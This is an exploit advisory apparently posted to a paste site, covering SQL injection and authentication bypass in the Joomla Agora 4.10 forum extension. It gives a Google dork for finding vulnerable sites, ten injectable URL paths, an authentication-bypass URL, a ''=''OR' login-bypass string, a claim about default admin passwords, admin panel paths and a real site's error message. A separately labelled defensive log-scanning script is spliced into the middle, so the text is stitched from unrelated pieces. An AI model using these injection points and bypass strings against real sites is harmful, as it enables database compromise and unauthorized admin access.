KingSkrupellos

Joomla Agora 4.10 SQL Injection / Authentication Bypass

Feb 11th, 2019
####################################################################

# Exploit Title : Joomla Agora 4.10 SQL Injection / Authentication Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/02/2019
# Vendor Homepage : joomla4ever.org
# Software Download Link : joomla4ever.org/archive/ext/com_agora.zip
# Software Information Link : joomla4ever.org/extensions/ext-agora
joomlashack.com/blog/joomla/agora/
# Software Version : 3.0 and 4.10 - other previous versions.
Compatible with Joomla 1.5 - 2.5 and 3.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_agora''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-287 [ Improper Authentication ]
CWE-592 [ Authentication Bypass Issues ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************

Agora is a forum extension for Joomla, compatible with versions 1.5 - 2.5 and 3.x.

####################################################################

# Impact :
***********
The Agora component for Joomla, version 4.10 and other versions, is prone to
an SQL injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database. A remote attacker can send a specially crafted request to the
vulnerable application and execute arbitrary SQL commands in the application's
database. Further exploitation of this vulnerability may result in
unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_agora&task=[SQL Injection]

/index.php?option=com_agora&task=profile&user_id=[SQL Injection]

/index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_agora&task=topic&id=[ID-NUMBER]&p=[SQL Injection]

/index.php?option=com_agora&task=profile&page=[SQL Injection]

/index.php?option=com_agora&task=profile&page=preview&action=[SQL Injection]

/index.php/templates/index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=[SQL Injection]

/index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=[SQL Injection]&lang=en

/component/agora/?task=viewforum&id=[SQL Injection]
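
Added example, not part of the original advisory: a log triage script that flags requests to the Agora component where one of the parameters listed above carries a value that is not a plain integer or keyword. The allow-lists are assumptions drawn from the advisory's own example URLs, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as injection points. Assumption: the first
# group carries integers and the second simple keywords, as in its example URLs.
NUMERIC = {"user_id", "id", "Itemid", "p"}
TOKEN = {"task", "page", "action", "type"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Names of Agora parameters whose decoded value is not a plain integer/keyword."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    is_agora = ("option", "com_agora") in pairs or "/component/agora" in parts.path
    if not is_agora:
        return []
    bad = set()
    for name, value in pairs:  # parse_qsl has already percent-decoded the value
        if name in NUMERIC and not re.fullmatch(r"[0-9]{1,10}", value):
            bad.add(name)
        elif name in TOKEN and not re.fullmatch(r"[A-Za-z_]{1,32}", value):
            bad.add(name)
    return sorted(bad)

def scan(lines):
    """Return (line_number, [parameter names]) for each flagged request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        bad = suspicious_params(match.group(1)) if match else []
        if bad:
            hits.append((number, bad))
    return hits

# Constructed sample access log (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_agora&task=topic&id=870&p=936 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Feb/2019:10:00:07 +0000] "GET /index.php?option=com_agora&task=profile&user_id=7281%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [12/Feb/2019:10:01:15 +0000] "GET /component/agora/?task=viewforum&id=1%27 HTTP/1.1" 200 4100',
    '198.51.100.7 - - [12/Feb/2019:10:01:20 +0000] "GET /index.php?option=com_content&id=1%27 HTTP/1.1" 200 900',
    '198.51.100.8 - - [12/Feb/2019:10:02:02 +0000] "GET /index.php?option=com_agora&task=profile%27&Itemid=39 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: non-conforming value in {', '.join(bad)}")
```

A hit means the value is not one the component's own links would produce; it does not confirm exploitation. The same allow-list is what the component's input handling should enforce before any value reaches a query.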

####################################################################

# Authentication Bypass/Incorrect Authorization Exploit :
*************************************
/index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=1&lang=en

Proof of Concept => cdn.pbrd.co/images/I0GjhUq.png

# Admin Panel Login Path :

/administrator
[PATH]/admin

Note : Admin Password is the domain address name.

'=''OR'
'=''OR'

/admin/index.php?option=com_agora&task=upload
/admin/mystore.php
/admin/editproducts.php
/admin/editcat.php
/admin/orders.php
/admin/members.php
/admin/editmanu.php
/admin/editpayment.php
/admin/addtaxrules.php
/admin/editshipping.php
/admin/newsletter.php
/admin/editpromos.php
/admin/import_export.php
/admin/editlangfile.php
/admin/custom_config.php

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# Example SQL Database Error :
****************************
Warning: Invalid argument supplied for foreach() in
/web/htdocs/www.gioblu.com/home/components
/com_agora/controller/index.php on line 145

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################